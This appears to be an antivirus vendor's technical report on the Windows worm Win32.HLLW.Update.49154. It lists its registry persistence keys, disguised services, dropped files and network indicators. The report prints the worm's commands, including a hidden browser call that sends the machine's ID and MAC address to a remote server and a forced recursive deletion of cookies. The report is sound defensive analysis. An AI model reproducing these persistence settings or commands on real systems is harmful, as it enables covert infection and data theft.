Win32.HLLW.Update.49154

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Userinit' = ',D:\moccall\mocall.exe'

Sets the following service settings

[HKLM\SYSTEM\CurrentControlSet\Services\Winspool] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\Winspool] 'ImagePath' = '<SYSTEM32>\svchost.exe -k netsvcs'
[HKLM\SYSTEM\CurrentControlSet\Services\Winspool\Parameters] 'ServiceDll' = '<SYSTEM32>\ntext\Winspool'
[HKLM\SYSTEM\CurrentControlSet\Services\winhelp] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\winhelp] 'ImagePath' = '<SYSTEM32>\winhelp.exe'
[HKLM\SYSTEM\CurrentControlSet\Services\mfcLib] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\mfcLib] 'ImagePath' = '%WINDIR%\mfcLib.exe'
[HKLM\SYSTEM\CurrentControlSet\Services\kernel64] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\kernel64] 'ImagePath' = '<SYSTEM32>\kernel64.exe'
[HKLM\SYSTEM\CurrentControlSet\Services\mfc64] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\mfc64] 'ImagePath' = '%WINDIR%\mfc64.exe'

Creates the following services

'Winspool' <SYSTEM32>\svchost.exe -k netsvcs
'winhelp' <SYSTEM32>\winhelp.exe
'mfcLib' %WINDIR%\mfcLib.exe
'kernel64' <SYSTEM32>\kernel64.exe
'mfc64' %WINDIR%\mfc64.exe

Malicious functions

To complicate detection of its presence in the operating system,

modifies the following system settings:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'

Executes the following

'%ProgramFiles%\internet explorer\iexplore.exe' http://12#.#0.108.207:8080/king/statAdd.jsp?pc=002&mac=6A:23:78:D0:42:1C
'%WINDIR%\syswow64\at.exe' /delete /yes
'%ProgramFiles(x86)%\internet explorer\iexplore.exe' "http://www.ku255.com/#27062"
'%ProgramFiles%\internet explorer\iexplore.exe' "http://www.ku255.com/#27062"
'%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://www.ku255.com/#27062
'%ProgramFiles%\internet explorer\iexplore.exe' http://www.ku255.com/#27062

Sets a new unauthorized home page for Windows Internet Explorer.

Modifies file system

Creates the following files

%TEMP%\iexplorer.exe
%TEMP%\alexa.exe
%TEMP%\ppstraem.exe
%TEMP%\zz2.exe
%TEMP%\small.exe
%TEMP%\vistatheme.exe
%TEMP%\vstart.exe
%WINDIR%\syswow64\fly2031.dll
%WINDIR%\syswow64\ntext\winsock2.dll
%WINDIR%\syswow64\ntext\winspool.dll
D:\moccall\mocall.exe
%TEMP%\afc9fe2f418b00a0.bat
%TEMP%\3596799a1543bc9f.aqq
%WINDIR%\syswow64\winhelp.exe
%WINDIR%\mfclib.exe
%ProgramFiles(x86)%\windows media player\morqsu.exe
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-1828d39f-b58.pma
%HOMEPATH%\desktop\internet explorer.lnk
%HOMEPATH%\application data\microsoft\internet explorer\quick launch\internet explorer.lnk
%APPDATA%\microsoft\windows\start menu\internet explorer.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\internet explorer.lnk
%APPDATA%\microsoft\windows\start menu\programs\internet explorer.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\internet explorer.lnk
%HOMEPATH%\favorites\ВґВґГІВµГ—ГЄГ±В¶ВјГіГЈГ«ВЈВ[ВґВґГІВµГ—ГЄГ±В¶-Г¶Г°В№ГєВґВґГІВµГЈГҐВ»В§ГГёГµВѕ].url
%HOMEPATH%\favorites\ВїГЎ256ГГёГ¶В·ВґГіГЁВ«--ГўГ¬Г©В«ГГёГ¶В·--Г¶Г°В№ГєГ—Г®Г—ВЁГІВµВµГ¤ГГёГ¶В·ВµВјВєВЅ.url
%HOMEPATH%\favorites\Г°ВЎГіГ®ГЇВ·,ГґГєГЇГџГ°ВЎГіГ®ГЇВ·,Г«В«ГЁГ«Г°ВЎГіГ®ГЇВ·,7k7kГ°ВЎГіГ®ГЇВ·.url
%HOMEPATH%\desktop\7k7kГ°ВЎГіГ®ГЇВ·.lnk
%WINDIR%\syswow64\kernel64.exe
%WINDIR%\mfc64.exe
%WINDIR%\syswow64\shanchu.bat
%LOCALAPPDATA%\microsoft\windows\inetcookies\deprecated.cookie
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-690afaa0-dd4.pma
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-690afaa7-f34.pma
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\manifest-000004
%LOCALAPPDATA%\microsoft\edge\user data\default\data_reduction_proxy_leveldb\000004.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\preferredapps
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\manifest-000001
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\000001.dbtmp
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\log
%LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\000003.log
%WINDIR%\syswow64\web.ini

Sets the 'hidden' attribute to the following files

%ProgramFiles(x86)%\windows media player\morqsu.exe

Deletes following files that it created itself

%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\w3u654n1\dnserror[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\0bxqfq0s\newerrorpagetemplate[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\wegbguha\errorpagestrings[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\23xpghij\httperrorpagesscripts[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\w3u654n1\down[1]
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-1828d39f-b58.pma
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-690afaa0-dd4.pma
%LOCALAPPDATA%\microsoft\edge\user data\browsermetrics\browsermetrics-690afaa7-f34.pma
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\0bxqfq0s\dnserror[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\w3u654n1\newerrorpagetemplate[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\0bxqfq0s\errorpagestrings[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\wegbguha\httperrorpagesscripts[1]
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\ie\23xpghij\down[1]
%HOMEPATH%\desktop\7k7kГ°ВЎГіГ®ГЇВ·.lnk
%HOMEPATH%\desktop\internet explorer.lnk
%HOMEPATH%\application data\microsoft\internet explorer\quick launch\internet explorer.lnk
%APPDATA%\microsoft\windows\start menu\internet explorer.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\internet explorer.lnk
%APPDATA%\microsoft\windows\start menu\programs\internet explorer.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\internet explorer.lnk

Moves the following files

from %LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\000001.dbtmp to %LOCALAPPDATA%\microsoft\edge\user data\default\shared_proto_db\metadata\current

Modifies the following files

%LOCALAPPDATA%\microsoft\edge\user data\last version
%HOMEPATH%\desktop\google chrome.lnk
%HOMEPATH%\desktop\telegram.lnk
%LOCALAPPDATA%\microsoft\edge\user data\default\sync data\leveldb\log
%LOCALAPPDATA%\microsoft\edge\user data\default\sync data\leveldb\000003.log
%LOCALAPPDATA%\microsoft\edge\user data\default\site characteristics database\log
%LOCALAPPDATA%\microsoft\tokenbroker\cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
%LOCALAPPDATA%\microsoft\edge\user data\last browser

Substitutes the following files

%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Platform Notifications\LOG
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\BudgetDatabase\LOG
%HOMEPATH%\desktop\internet explorer.lnk
%HOMEPATH%\application data\microsoft\internet explorer\quick launch\internet explorer.lnk
%APPDATA%\microsoft\windows\start menu\internet explorer.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\internet explorer.lnk
%APPDATA%\microsoft\windows\start menu\programs\internet explorer.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\internet explorer.lnk
%HOMEPATH%\desktop\7k7kГ°ВЎГіГ®ГЇВ·.lnk

Network activity

Connects to

'12#.#24.9.120':80
'localhost':8389
'255.255.255.255':80
'12#.#0.108.207':8080
'255.255.255.255':82

UDP

DNS ASK sj##.3322.org
DNS ASK ct.##t123.cn
DNS ASK ad.##595.com
DNS ASK bb#.#x008.cn
DNS ASK ll##.3322.org
DNS ASK fi#####.###tings.services.mozilla.com
DNS ASK ku##5.com
DNS ASK co####.hao123soso.cn
DNS ASK bt#.#qzone.net
DNS ASK su###qqface.com

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''
ClassName: 'Chrome_MessageWindow' WindowName: '%LOCALAPPDATA%\Microsoft\Edge\User Data'
ClassName: 'IEFrame' WindowName: ''
ClassName: 'MS_AutodialMonitor' WindowName: ''
ClassName: 'MS_WebCheckMonitor' WindowName: ''

Creates and executes the following

'%TEMP%\alexa.exe'
'%TEMP%\ppstraem.exe'
'%TEMP%\small.exe'
'%TEMP%\zz2.exe'
'%TEMP%\vstart.exe'
'%TEMP%\vistatheme.exe'
'%TEMP%\iexplorer.exe'
'D:\moccall\mocall.exe'
'%WINDIR%\syswow64\winhelp.exe'
'%WINDIR%\mfclib.exe'
'%WINDIR%\syswow64\kernel64.exe'
'%WINDIR%\mfc64.exe'
'%ProgramFiles(x86)%\windows media player\morqsu.exe' lnk nothing

Executes the following

'%WINDIR%\syswow64\rundll32.exe' fly2031.dll , InstallMyDll
'%WINDIR%\syswow64\cmd.exe' /c afc9fe2f418b00a0.bat
'%ProgramFiles(x86)%\microsoft\edge\application\89.0.774.68\bho\ie_to_edge_stub.exe' --from-ie-to-edge=3 --ie-frame-hwnd=e02ac
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --from-ie-to-edge=3 --ie-frame-hwnd=e02ac
'%WINDIR%\syswow64\cmd.exe' /C at /delete /yes
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --from-ie-to-edge=3 --ie-frame-hwnd=e02ac --flag-switches-begin --flag-switches-end --do-not-de-elevate
'%WINDIR%\syswow64\cmd.exe' /C del "%USERPROFILE%\cookies\*" /f /s /q
'%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\shanchu.bat
'%ProgramFiles(x86)%\microsoft\edge\application\89.0.774.68\bho\ie_to_edge_stub.exe' --from-ie-to-edge=3 --ie-frame-hwnd=40294
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --from-ie-to-edge=3 --ie-frame-hwnd=40294
'%WINDIR%\syswow64\cmd.exe' /c afc9fe2f418b00a0.bat' (with hidden window)
'%ProgramFiles%\internet explorer\iexplore.exe' http://12#.#0.108.207:8080/king/statAdd.jsp?pc=002&mac=6A:23:78:D0:42:1C' (with hidden window)
'%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --from-ie-to-edge=3 --ie-frame-hwnd=e02ac --flag-switches-begin --flag-switches-end --do-not-de-elevate' (with hidden window)
'%ProgramFiles(x86)%\internet explorer\iexplore.exe' "http://www.ku255.com/#27062"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\shanchu.bat' (with hidden window)
'%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://www.ku255.com/#27062' (with hidden window)

Technologies

Begriffe

Schulung und Training

Mythen

Technical Information